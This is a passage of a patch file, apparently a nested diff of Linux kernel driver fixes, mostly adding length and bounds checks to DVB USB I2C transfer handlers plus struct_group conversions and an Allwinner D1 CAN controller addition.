+diff --git a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+index 3b76a9d0383a8..1bbe58b24d99d 100644
+--- a/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
++++ b/drivers/media/pci/intel/ipu3/ipu3-cio2-main.c
+@@ -354,7 +354,7 @@ static int cio2_hw_init(struct cio2_device *cio2, struct cio2_queue *q)
+ 	void __iomem *const base = cio2->base;
+ 	u8 lanes, csi2bus = q->csi2.port;
+ 	u8 sensor_vc = SENSOR_VIR_CH_DFLT;
+-	struct cio2_csi2_timing timing;
++	struct cio2_csi2_timing timing = { 0 };
+ 	int i, r;
+ 
+ 	fmt = cio2_find_format(NULL, &q->subdev_fmt.code);
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+index 7bc05f42a23c1..9a3f46c1f6ba3 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+@@ -775,11 +775,13 @@ static int mdp_get_subsys_id(struct device *dev, struct device_node *node,
+ 	ret = cmdq_dev_get_client_reg(&comp_pdev->dev, &cmdq_reg, index);
+ 	if (ret != 0) {
+ 		dev_err(&comp_pdev->dev, "cmdq_dev_get_subsys fail!\n");
++		put_device(&comp_pdev->dev);
+ 		return -EINVAL;
+ 	}
+ 
+ 	comp->subsys_id = cmdq_reg.subsys;
+ 	dev_dbg(&comp_pdev->dev, "subsys id=%d\n", cmdq_reg.subsys);
++	put_device(&comp_pdev->dev);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/tuners/qt1010.c b/drivers/media/tuners/qt1010.c
+index 60931367b82ca..48fc79cd40273 100644
+--- a/drivers/media/tuners/qt1010.c
++++ b/drivers/media/tuners/qt1010.c
+@@ -345,11 +345,12 @@ static int qt1010_init(struct dvb_frontend *fe)
+ 			else
+ 				valptr = &tmpval;
+ 
+-			BUG_ON(i >= ARRAY_SIZE(i2c_data) - 1);
+-
+-			err = qt1010_init_meas1(priv, i2c_data[i+1].reg,
+-						i2c_data[i].reg,
+-						i2c_data[i].val, valptr);
++			if (i >= ARRAY_SIZE(i2c_data) - 1)
++				err = -EIO;
++			else
++				err = qt1010_init_meas1(priv, i2c_data[i + 1].reg,
++							i2c_data[i].reg,
++							i2c_data[i].val, valptr);
+ 			i++;
+ 			break;
+ 		}
+diff --git a/drivers/media/usb/dvb-usb-v2/af9035.c b/drivers/media/usb/dvb-usb-v2/af9035.c
+index 1e9c8d01523be..cd6f5374414d4 100644
+--- a/drivers/media/usb/dvb-usb-v2/af9035.c
++++ b/drivers/media/usb/dvb-usb-v2/af9035.c
+@@ -270,6 +270,7 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 	struct dvb_usb_device *d = i2c_get_adapdata(adap);
+ 	struct state *state = d_to_priv(d);
+ 	int ret;
++	u32 reg;
+ 
+ 	if (mutex_lock_interruptible(&d->i2c_mutex) < 0)
+ 		return -EAGAIN;
+@@ -322,8 +323,10 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
++			if (msg[0].len < 3 || msg[1].len < 1)
++				return -EOPNOTSUPP;
+ 			/* demod access via firmware interface */
+-			u32 reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
++			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+ 
+ 			if (msg[0].addr == state->af9033_i2c_addr[1])
+@@ -381,17 +384,16 @@ static int af9035_i2c_master_xfer(struct i2c_adapter *adap,
+ 			ret = -EOPNOTSUPP;
+ 		} else if ((msg[0].addr == state->af9033_i2c_addr[0]) ||
+ 			   (msg[0].addr == state->af9033_i2c_addr[1])) {
++			if (msg[0].len < 3)
++				return -EOPNOTSUPP;
+ 			/* demod access via firmware interface */
+-			u32 reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
++			reg = msg[0].buf[0] << 16 | msg[0].buf[1] << 8 |
+ 					msg[0].buf[2];
+ 
+ 			if (msg[0].addr == state->af9033_i2c_addr[1])
+ 				reg |= 0x100000;
+ 
+-			ret = (msg[0].len >= 3) ? af9035_wr_regs(d, reg,
+-							         &msg[0].buf[3],
+-							         msg[0].len - 3)
+-					        : -EOPNOTSUPP;
++			ret = af9035_wr_regs(d, reg, &msg[0].buf[3], msg[0].len - 3);
+ 		} else {
+ 			/* I2C write */
+ 			u8 buf[MAX_XFER_SIZE];
+diff --git a/drivers/media/usb/dvb-usb-v2/anysee.c b/drivers/media/usb/dvb-usb-v2/anysee.c
+index aa45b5d263f6b..a1235d0cce92f 100644
+--- a/drivers/media/usb/dvb-usb-v2/anysee.c
++++ b/drivers/media/usb/dvb-usb-v2/anysee.c
+@@ -202,7 +202,7 @@ static int anysee_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 
+ 	while (i < num) {
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+-			if (msg[i].len > 2 || msg[i+1].len > 60) {
++			if (msg[i].len != 2 || msg[i + 1].len > 60) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/drivers/media/usb/dvb-usb-v2/az6007.c b/drivers/media/usb/dvb-usb-v2/az6007.c
+index 7524c90f5da61..6cbfe75791c21 100644
+--- a/drivers/media/usb/dvb-usb-v2/az6007.c
++++ b/drivers/media/usb/dvb-usb-v2/az6007.c
+@@ -788,6 +788,10 @@ static int az6007_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			if (az6007_xfer_debug)
+ 				printk(KERN_DEBUG "az6007: I2C W addr=0x%x len=%d\n",
+ 				       addr, msgs[i].len);
++			if (msgs[i].len < 1) {
++				ret = -EIO;
++				goto err;
++			}
+ 			req = AZ6007_I2C_WR;
+ 			index = msgs[i].buf[0];
+ 			value = addr | (1 << 8);
+@@ -802,6 +806,10 @@ static int az6007_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msgs[],
+ 			if (az6007_xfer_debug)
+ 				printk(KERN_DEBUG "az6007: I2C R addr=0x%x len=%d\n",
+ 				       addr, msgs[i].len);
++			if (msgs[i].len < 1) {
++				ret = -EIO;
++				goto err;
++			}
+ 			req = AZ6007_I2C_RD;
+ 			index = msgs[i].buf[0];
+ 			value = addr;
+diff --git a/drivers/media/usb/dvb-usb-v2/gl861.c b/drivers/media/usb/dvb-usb-v2/gl861.c
+index 0c434259c36f1..c71e7b93476de 100644
+--- a/drivers/media/usb/dvb-usb-v2/gl861.c
++++ b/drivers/media/usb/dvb-usb-v2/gl861.c
+@@ -120,7 +120,7 @@ static int gl861_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	} else if (num == 2 && !(msg[0].flags & I2C_M_RD) &&
+ 		   (msg[1].flags & I2C_M_RD)) {
+ 		/* I2C write + read */
+-		if (msg[0].len > 1 || msg[1].len > sizeof(ctx->buf)) {
++		if (msg[0].len != 1 || msg[1].len > sizeof(ctx->buf)) {
+ 			ret = -EOPNOTSUPP;
+ 			goto err;
+ 		}
+diff --git a/drivers/media/usb/dvb-usb/af9005.c b/drivers/media/usb/dvb-usb/af9005.c
+index 0827bf3d4e8c7..13604e6acdb83 100644
+--- a/drivers/media/usb/dvb-usb/af9005.c
++++ b/drivers/media/usb/dvb-usb/af9005.c
+@@ -422,6 +422,10 @@ static int af9005_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 		if (ret == 0)
+ 			ret = 2;
+ 	} else {
++		if (msg[0].len < 2) {
++			ret = -EOPNOTSUPP;
++			goto unlock;
++		}
+ 		/* write one or more registers */
+ 		reg = msg[0].buf[0];
+ 		addr = msg[0].addr;
+@@ -431,6 +435,7 @@ static int af9005_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = 1;
+ 	}
+ 
++unlock:
+ 	mutex_unlock(&d->i2c_mutex);
+ 	return ret;
+ }
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 8747960e61461..356fc728d59a8 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -128,6 +128,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 
+ 	switch (num) {
+ 	case 2:
++		if (msg[0].len < 1) {
++			num = -EOPNOTSUPP;
++			break;
++		}
+ 		/* read stv0299 register */
+ 		value = msg[0].buf[0];/* register */
+ 		for (i = 0; i < msg[1].len; i++) {
+@@ -139,6 +143,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	case 1:
+ 		switch (msg[0].addr) {
+ 		case 0x68:
++			if (msg[0].len < 2) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			/* write to stv0299 register */
+ 			buf6[0] = 0x2a;
+ 			buf6[1] = msg[0].buf[0];
+@@ -148,6 +156,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			break;
+ 		case 0x60:
+ 			if (msg[0].flags == 0) {
++				if (msg[0].len < 4) {
++					num = -EOPNOTSUPP;
++					break;
++				}
+ 			/* write to tuner pll */
+ 				buf6[0] = 0x2c;
+ 				buf6[1] = 5;
+@@ -159,6 +171,10 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				dw210x_op_rw(d->udev, 0xb2, 0, 0,
+ 						buf6, 7, DW210X_WRITE_MSG);
+ 			} else {
++				if (msg[0].len < 1) {
++					num = -EOPNOTSUPP;
++					break;
++				}
+ 			/* read from tuner */
+ 				dw210x_op_rw(d->udev, 0xb5, 0, 0,
+ 						buf6, 1, DW210X_READ_MSG);
+@@ -166,12 +182,20 @@ static int dw2102_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			}
+ 			break;
+ 		case (DW2102_RC_QUERY):
++			if (msg[0].len < 2) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			dw210x_op_rw(d->udev, 0xb8, 0, 0,
+ 					buf6, 2, DW210X_READ_MSG);
+ 			msg[0].buf[0] = buf6[0];
+ 			msg[0].buf[1] = buf6[1];
+ 			break;
+ 		case (DW2102_VOLTAGE_CTRL):
++			if (msg[0].len < 1) {
++				num = -EOPNOTSUPP;
++				break;
++			}
+ 			buf6[0] = 0x30;
+ 			buf6[1] = msg[0].buf[0];
+ 			dw210x_op_rw(d->udev, 0xb2, 0, 0,
+diff --git a/drivers/misc/Kconfig b/drivers/misc/Kconfig
+index 358ad56f65245..0cef98319f0e5 100644
+--- a/drivers/misc/Kconfig
++++ b/drivers/misc/Kconfig
+@@ -474,6 +474,7 @@ config HISI_HIKEY_USB
+ config OPEN_DICE
+ 	tristate "Open Profile for DICE driver"
+ 	depends on OF_RESERVED_MEM
++	depends on HAS_IOMEM
+ 	help
+ 	  This driver exposes a DICE reserved memory region to userspace via
+ 	  a character device. The memory region contains Compound Device
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 13518cac076c7..4c51d216f3d43 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -310,8 +310,8 @@ static void fastrpc_free_map(struct kref *ref)
+ 				return;
+ 			}
+ 		}
+-		dma_buf_unmap_attachment(map->attach, map->table,
+-					 DMA_BIDIRECTIONAL);
++		dma_buf_unmap_attachment_unlocked(map->attach, map->table,
++						  DMA_BIDIRECTIONAL);
+ 		dma_buf_detach(map->buf, map->attach);
+ 		dma_buf_put(map->buf);
+ 	}
+@@ -711,6 +711,7 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ {
+ 	struct fastrpc_session_ctx *sess = fl->sctx;
+ 	struct fastrpc_map *map = NULL;
++	struct sg_table *table;
+ 	int err = 0;
+ 
+ 	if (!fastrpc_map_lookup(fl, fd, ppmap, true))
+@@ -736,11 +737,12 @@ static int fastrpc_map_create(struct fastrpc_user *fl, int fd,
+ 		goto attach_err;
+ 	}
+ 
+-	map->table = dma_buf_map_attachment(map->attach, DMA_BIDIRECTIONAL);
+-	if (IS_ERR(map->table)) {
+-		err = PTR_ERR(map->table);
++	table = dma_buf_map_attachment_unlocked(map->attach, DMA_BIDIRECTIONAL);
++	if (IS_ERR(table)) {
++		err = PTR_ERR(table);
+ 		goto map_err;
+ 	}
++	map->table = table;
+ 
+ 	map->phys = sg_dma_address(map->table->sgl);
+ 	map->phys += ((u64)fl->sctx->sid << 32);
+diff --git a/drivers/mmc/host/sdhci-esdhc-imx.c b/drivers/mmc/host/sdhci-esdhc-imx.c
+index b63cf1f9e8fb9..3c7b32c0d3f3f 100644
+--- a/drivers/mmc/host/sdhci-esdhc-imx.c
++++ b/drivers/mmc/host/sdhci-esdhc-imx.c
+@@ -171,8 +171,8 @@
+ #define ESDHC_FLAG_HS400		BIT(9)
+ /*
+  * The IP has errata ERR010450
+- * uSDHC: Due to the I/O timing limit, for SDR mode, SD card clock can't
+- * exceed 150MHz, for DDR mode, SD card clock can't exceed 45MHz.
++ * uSDHC: At 1.8V, due to the I/O timing limit, the SD card clock can't
++ * exceed 150MHz in SDR mode or 45MHz in DDR mode.
+  */
+ #define ESDHC_FLAG_ERR010450		BIT(10)
+ /* The IP supports HS400ES mode */
+@@ -932,7 +932,8 @@ static inline void esdhc_pltfm_set_clock(struct sdhci_host *host,
+ 		| ESDHC_CLOCK_MASK);
+ 	sdhci_writel(host, temp, ESDHC_SYSTEM_CONTROL);
+ 
+-	if (imx_data->socdata->flags & ESDHC_FLAG_ERR010450) {
++	if ((imx_data->socdata->flags & ESDHC_FLAG_ERR010450) &&
++	    (!(host->quirks2 & SDHCI_QUIRK2_NO_1_8_V))) {
+ 		unsigned int max_clock;
+ 
+ 		max_clock = imx_data->is_ddr ? 45000000 : 150000000;
+diff --git a/drivers/net/can/Kconfig b/drivers/net/can/Kconfig
+index 3048ad77edb35..8236aabebb394 100644
+--- a/drivers/net/can/Kconfig
++++ b/drivers/net/can/Kconfig
+@@ -174,10 +174,10 @@ config CAN_SLCAN
+ 
+ config CAN_SUN4I
+ 	tristate "Allwinner A10 CAN controller"
+-	depends on MACH_SUN4I || MACH_SUN7I || COMPILE_TEST
++	depends on MACH_SUN4I || MACH_SUN7I || RISCV || COMPILE_TEST
+ 	help
+ 	  Say Y here if you want to use CAN controller found on Allwinner
+-	  A10/A20 SoCs.
++	  A10/A20/D1 SoCs.
+ 
+ 	  To compile this driver as a module, choose M here: the module will
+ 	  be called sun4i_can.
+diff --git a/drivers/net/can/sun4i_can.c b/drivers/net/can/sun4i_can.c
+index 2b78f9197681b..c3a6b028ea4d6 100644
+--- a/drivers/net/can/sun4i_can.c
++++ b/drivers/net/can/sun4i_can.c
+@@ -91,6 +91,8 @@
+ #define SUN4I_REG_BUF12_ADDR	0x0070	/* CAN Tx/Rx Buffer 12 */
+ #define SUN4I_REG_ACPC_ADDR	0x0040	/* CAN Acceptance Code 0 */
+ #define SUN4I_REG_ACPM_ADDR	0x0044	/* CAN Acceptance Mask 0 */
++#define SUN4I_REG_ACPC_ADDR_D1	0x0028	/* CAN Acceptance Code 0 on the D1 */
++#define SUN4I_REG_ACPM_ADDR_D1	0x002C	/* CAN Acceptance Mask 0 on the D1 */
+ #define SUN4I_REG_RBUF_RBACK_START_ADDR	0x0180	/* CAN transmit buffer start */
+ #define SUN4I_REG_RBUF_RBACK_END_ADDR	0x01b0	/* CAN transmit buffer end */
+ 
+@@ -205,9 +207,11 @@
+  * struct sun4ican_quirks - Differences between SoC variants.
+  *
+  * @has_reset: SoC needs reset deasserted.
++ * @acp_offset: Offset of ACPC and ACPM registers
+  */
+ struct sun4ican_quirks {
+ 	bool has_reset;
++	int acp_offset;
+ };
+ 
+ struct sun4ican_priv {
+@@ -216,6 +220,7 @@ struct sun4ican_priv {
+ 	struct clk *clk;
+ 	struct reset_control *reset;
+ 	spinlock_t cmdreg_lock;	/* lock for concurrent cmd register writes */
++	int acp_offset;
+ };
+ 
+ static const struct can_bittiming_const sun4ican_bittiming_const = {
+@@ -338,8 +343,8 @@ static int sun4i_can_start(struct net_device *dev)
+ 	}
+ 
+ 	/* set filters - we accept all */
+-	writel(0x00000000, priv->base + SUN4I_REG_ACPC_ADDR);
+-	writel(0xFFFFFFFF, priv->base + SUN4I_REG_ACPM_ADDR);
++	writel(0x00000000, priv->base + SUN4I_REG_ACPC_ADDR + priv->acp_offset);
++	writel(0xFFFFFFFF, priv->base + SUN4I_REG_ACPM_ADDR + priv->acp_offset);
+ 
+ 	/* clear error counters and error code capture */
+ 	writel(0, priv->base + SUN4I_REG_ERRC_ADDR);
+@@ -768,10 +773,17 @@ static const struct ethtool_ops sun4ican_ethtool_ops = {
+ 
+ static const struct sun4ican_quirks sun4ican_quirks_a10 = {
+ 	.has_reset = false,
++	.acp_offset = 0,
+ };
+ 
+ static const struct sun4ican_quirks sun4ican_quirks_r40 = {
+ 	.has_reset = true,
++	.acp_offset = 0,
++};
++
++static const struct sun4ican_quirks sun4ican_quirks_d1 = {
++	.has_reset = true,
++	.acp_offset = (SUN4I_REG_ACPC_ADDR_D1 - SUN4I_REG_ACPC_ADDR),
+ };
+ 
+ static const struct of_device_id sun4ican_of_match[] = {
+@@ -784,6 +796,9 @@ static const struct of_device_id sun4ican_of_match[] = {
+ 	}, {
+ 		.compatible = "allwinner,sun8i-r40-can",
+ 		.data = &sun4ican_quirks_r40
++	}, {
++		.compatible = "allwinner,sun20i-d1-can",
++		.data = &sun4ican_quirks_d1
+ 	}, {
+ 		/* sentinel */
+ 	},
+@@ -872,6 +887,7 @@ static int sun4ican_probe(struct platform_device *pdev)
+ 	priv->base = addr;
+ 	priv->clk = clk;
+ 	priv->reset = reset;
++	priv->acp_offset = quirks->acp_offset;
+ 	spin_lock_init(&priv->cmdreg_lock);
+ 
+ 	platform_set_drvdata(pdev, dev);
+@@ -909,4 +925,4 @@ module_platform_driver(sun4i_can_driver);
+ MODULE_AUTHOR("Peter Chen <xingkongcp@gmail.com>");
+ MODULE_AUTHOR("Gerhard Bertelsmann <info@gerhard-bertelsmann.de>");
+ MODULE_LICENSE("Dual BSD/GPL");
+-MODULE_DESCRIPTION("CAN driver for Allwinner SoCs (A10/A20)");
++MODULE_DESCRIPTION("CAN driver for Allwinner SoCs (A10/A20/D1)");
+diff --git a/drivers/net/ethernet/atheros/alx/ethtool.c b/drivers/net/ethernet/atheros/alx/ethtool.c
+index b716adacd8159..7f6b69a523676 100644
+--- a/drivers/net/ethernet/atheros/alx/ethtool.c
++++ b/drivers/net/ethernet/atheros/alx/ethtool.c
+@@ -292,9 +292,8 @@ static void alx_get_ethtool_stats(struct net_device *netdev,
+ 	spin_lock(&alx->stats_lock);
+ 
+ 	alx_update_hw_stats(hw);
+-	BUILD_BUG_ON(sizeof(hw->stats) - offsetof(struct alx_hw_stats, rx_ok) <
+-		     ALX_NUM_STATS * sizeof(u64));
+-	memcpy(data, &hw->stats.rx_ok, ALX_NUM_STATS * sizeof(u64));
++	BUILD_BUG_ON(sizeof(hw->stats) != ALX_NUM_STATS * sizeof(u64));
++	memcpy(data, &hw->stats, sizeof(hw->stats));
+ 
+ 	spin_unlock(&alx->stats_lock);
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_eswitch.c b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+index 2ffe5708a045b..7de4a8a4b563c 100644
+--- a/drivers/net/ethernet/intel/ice/ice_eswitch.c
++++ b/drivers/net/ethernet/intel/ice/ice_eswitch.c
+@@ -361,6 +361,9 @@ ice_eswitch_port_start_xmit(struct sk_buff *skb, struct net_device *netdev)
+ 	np = netdev_priv(netdev);
+ 	vsi = np->vsi;
+ 
++	if (!vsi || !ice_is_switchdev_running(vsi->back))
++		return NETDEV_TX_BUSY;
++
+ 	if (ice_is_reset_in_progress(vsi->back->state) ||
+ 	    test_bit(ICE_VF_DIS, vsi->back->state))
+ 		return NETDEV_TX_BUSY;
+diff --git a/drivers/net/wireless/ath/ath9k/ahb.c b/drivers/net/wireless/ath/ath9k/ahb.c
+index 9cd12b20b18d8..9bfaadfa6c009 100644
+--- a/drivers/net/wireless/ath/ath9k/ahb.c
++++ b/drivers/net/wireless/ath/ath9k/ahb.c
+@@ -132,8 +132,8 @@ static int ath_ahb_probe(struct platform_device *pdev)
+ 
+ 	ah = sc->sc_ah;
+ 	ath9k_hw_name(ah, hw_name, sizeof(hw_name));
+-	wiphy_info(hw->wiphy, "%s mem=0x%lx, irq=%d\n",
+-		   hw_name, (unsigned long)mem, irq);
++	wiphy_info(hw->wiphy, "%s mem=0x%p, irq=%d\n",
++		   hw_name, mem, irq);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/mac.h b/drivers/net/wireless/ath/ath9k/mac.h
+index af44b33814ddc..f03d792732da7 100644
+--- a/drivers/net/wireless/ath/ath9k/mac.h
++++ b/drivers/net/wireless/ath/ath9k/mac.h
+@@ -115,8 +115,10 @@ struct ath_tx_status {
+ 	u8 qid;
+ 	u16 desc_id;
+ 	u8 tid;
+-	u32 ba_low;
+-	u32 ba_high;
++	struct_group(ba,
++		u32 ba_low;
++		u32 ba_high;
++	);
+ 	u32 evm0;
+ 	u32 evm1;
+ 	u32 evm2;
+diff --git a/drivers/net/wireless/ath/ath9k/pci.c b/drivers/net/wireless/ath/ath9k/pci.c
+index a074e23013c58..f0e3901e8182a 100644
+--- a/drivers/net/wireless/ath/ath9k/pci.c
++++ b/drivers/net/wireless/ath/ath9k/pci.c
+@@ -988,8 +988,8 @@ static int ath_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	sc->sc_ah->msi_reg = 0;
+ 
+ 	ath9k_hw_name(sc->sc_ah, hw_name, sizeof(hw_name));
+-	wiphy_info(hw->wiphy, "%s mem=0x%lx, irq=%d\n",
+-		   hw_name, (unsigned long)sc->mem, pdev->irq);
++	wiphy_info(hw->wiphy, "%s mem=0x%p, irq=%d\n",
++		   hw_name, sc->mem, pdev->irq);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/xmit.c b/drivers/net/wireless/ath/ath9k/xmit.c
+index ba271a10d4ab1..eeabdd67fbccd 100644
+--- a/drivers/net/wireless/ath/ath9k/xmit.c
++++ b/drivers/net/wireless/ath/ath9k/xmit.c
+@@ -462,7 +462,7 @@ static void ath_tx_count_frames(struct ath_softc *sc, struct ath_buf *bf,
+ 	isaggr = bf_isaggr(bf);
+ 	if (isaggr) {
+ 		seq_st = ts->ts_seqnum;
+-		memcpy(ba, &ts->ba_low, WME_BA_BMP_SIZE >> 3);
++		memcpy(ba, &ts->ba, WME_BA_BMP_SIZE >> 3);
+ 	}
+ 
+ 	while (bf) {
+@@ -545,7 +545,7 @@ static void ath_tx_complete_aggr(struct ath_softc *sc, struct ath_txq *txq,
+ 	if (isaggr && txok) {
+ 		if (ts->ts_flags & ATH9K_TX_BA) {
+ 			seq_st = ts->ts_seqnum;
+-			memcpy(ba, &ts->ba_low, WME_BA_BMP_SIZE >> 3);
++			memcpy(ba, &ts->ba, WME_BA_BMP_SIZE >> 3);
+ 		} else {
+ 			/*
+ 			 * AR5416 can become deaf/mute when BA
+diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c
+index 237cbd5c5060b..f29ac6de71399 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx.c
++++ b/drivers/net/wireless/ath/wil6210/txrx.c
+@@ -666,7 +666,7 @@ static int wil_rx_crypto_check(struct wil6210_priv *wil, struct sk_buff *skb)
+ 	struct wil_tid_crypto_rx *c = mc ? &s->group_crypto_rx :
+ 				      &s->tid_crypto_rx[tid];
+ 	struct wil_tid_crypto_rx_single *cc = &c->key_id[key_id];
+-	const u8 *pn = (u8 *)&d->mac.pn_15_0;
++	const u8 *pn = (u8 *)&d->mac.pn;
+ 
+ 	if (!cc->key_set) {
+ 		wil_err_ratelimited(wil,
+diff --git a/drivers/net/wireless/ath/wil6210/txrx.h b/drivers/net/wireless/ath/wil6210/txrx.h
+index 1ae1bec1b97f1..689f68d89a440 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx.h
++++ b/drivers/net/wireless/ath/wil6210/txrx.h
+@@ -343,8 +343,10 @@ struct vring_rx_mac {
+ 	u32 d0;
+ 	u32 d1;
+ 	u16 w4;
+-	u16 pn_15_0;
+-	u32 pn_47_16;
++	struct_group_attr(pn, __packed,
++		u16 pn_15_0;
++		u32 pn_47_16;
++	);
+ } __packed;
+ 
+ /* Rx descriptor - DMA part
+diff --git a/drivers/net/wireless/ath/wil6210/txrx_edma.c b/drivers/net/wireless/ath/wil6210/txrx_edma.c
+index 201c8c35e0c9e..1ba1f21ebea26 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx_edma.c
++++ b/drivers/net/wireless/ath/wil6210/txrx_edma.c
+@@ -548,7 +548,7 @@ static int wil_rx_crypto_check_edma(struct wil6210_priv *wil,
+ 	s = &wil->sta[cid];
+ 	c = mc ? &s->group_crypto_rx : &s->tid_crypto_rx[tid];
+ 	cc = &c->key_id[key_id];
+-	pn = (u8 *)&st->ext.pn_15_0;
++	pn = (u8 *)&st->ext.pn;
+ 
+ 	if (!cc->key_set) {
+ 		wil_err_ratelimited(wil,
+diff --git a/drivers/net/wireless/ath/wil6210/txrx_edma.h b/drivers/net/wireless/ath/wil6210/txrx_edma.h
+index c736f7413a35f..ee90e225bb050 100644
+--- a/drivers/net/wireless/ath/wil6210/txrx_edma.h
++++ b/drivers/net/wireless/ath/wil6210/txrx_edma.h
+@@ -330,8 +330,10 @@ struct wil_rx_status_extension {
+ 	u32 d0;
+ 	u32 d1;
+ 	__le16 seq_num; /* only lower 12 bits */
+-	u16 pn_15_0;
+-	u32 pn_47_16;
++	struct_group_attr(pn, __packed,
++		u16 pn_15_0;
++		u32 pn_47_16;
++	);
+ } __packed;
+ 
+ struct wil_rx_status_extended {
+diff --git a/drivers/net/wireless/mac80211_hwsim.c b/drivers/net/wireless/mac80211_hwsim.c
+index da5c355405f68..db70cef854bc4 100644
+--- a/drivers/net/wireless/mac80211_hwsim.c
++++ b/drivers/net/wireless/mac80211_hwsim.c
+@@ -4906,14 +4906,15 @@ static int hwsim_cloned_frame_received_nl(struct sk_buff *skb_2,
+ 	frame_data_len = nla_len(info->attrs[HWSIM_ATTR_FRAME]);
+ 	frame_data = (void *)nla_data(info->attrs[HWSIM_ATTR_FRAME]);
+ 
++	if (frame_data_len < sizeof(struct ieee80211_hdr_3addr) ||
++	    frame_data_len > IEEE80211_MAX_DATA_LEN)
++		goto err;
++
+ 	/* Allocate new skb here */
+ 	skb = alloc_skb(frame_data_len, GFP_KERNEL);
+ 	if (skb == NULL)
+ 		goto err;
+ 
+-	if (frame_data_len > IEEE80211_MAX_DATA_LEN)
+-		goto err;
+-
+ 	/* Copy the data */
+ 	skb_put_data(skb, frame_data, frame_data_len);
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/tdls.c b/drivers/net/wireless/marvell/mwifiex/tdls.c
+index 97bb87c3676bb..6c60621b6cccb 100644
+--- a/drivers/net/wireless/marvell/mwifiex/tdls.c
++++ b/drivers/net/wireless/marvell/mwifiex/tdls.c
+@@ -735,6 +735,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 	int ret;
+ 	u16 capab;
+ 	struct ieee80211_ht_cap *ht_cap;
++	unsigned int extra;
+ 	u8 radio, *pos;
+ 
+ 	capab = priv->curr_bss_params.bss_descriptor.cap_info_bitmap;
+@@ -753,7 +754,10 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 
+ 	switch (action_code) {
+ 	case WLAN_PUB_ACTION_TDLS_DISCOVER_RES:
+-		skb_put(skb, sizeof(mgmt->u.action.u.tdls_discover_resp) + 1);
++		/* See the layout of 'struct ieee80211_mgmt'. */
++		extra = sizeof(mgmt->u.action.u.tdls_discover_resp) +
++			sizeof(mgmt->u.action.category);
++		skb_put(skb, extra);
+ 		mgmt->u.action.category = WLAN_CATEGORY_PUBLIC;
+ 		mgmt->u.action.u.tdls_discover_resp.action_code =
+ 					      WLAN_PUB_ACTION_TDLS_DISCOVER_RES;
+@@ -762,8 +766,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv,
+ 		mgmt->u.action.u.tdls_discover_resp.capability =
+ 							     cpu_to_le16(capab);
+ 		/* move back for addr4 */
+-		memmove(pos + ETH_ALEN, &mgmt->u.action.category,
+-			sizeof(mgmt->u.action.u.tdls_discover_resp));
++		memmove(pos + ETH_ALEN, &mgmt->u.action, extra);
+ 		/* init address 4 */
+ 		eth_broadcast_addr(pos);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+index 1c0d8cf19b8eb..49ddca84f7862 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mac.c
+@@ -1167,6 +1167,10 @@ int mt7921_usb_sdio_tx_prepare_skb(struct mt76_dev *mdev, void *txwi_ptr,
+ 	if (unlikely(tx_info->skb->len <= ETH_HLEN))
+ 		return -EINVAL;
+ 
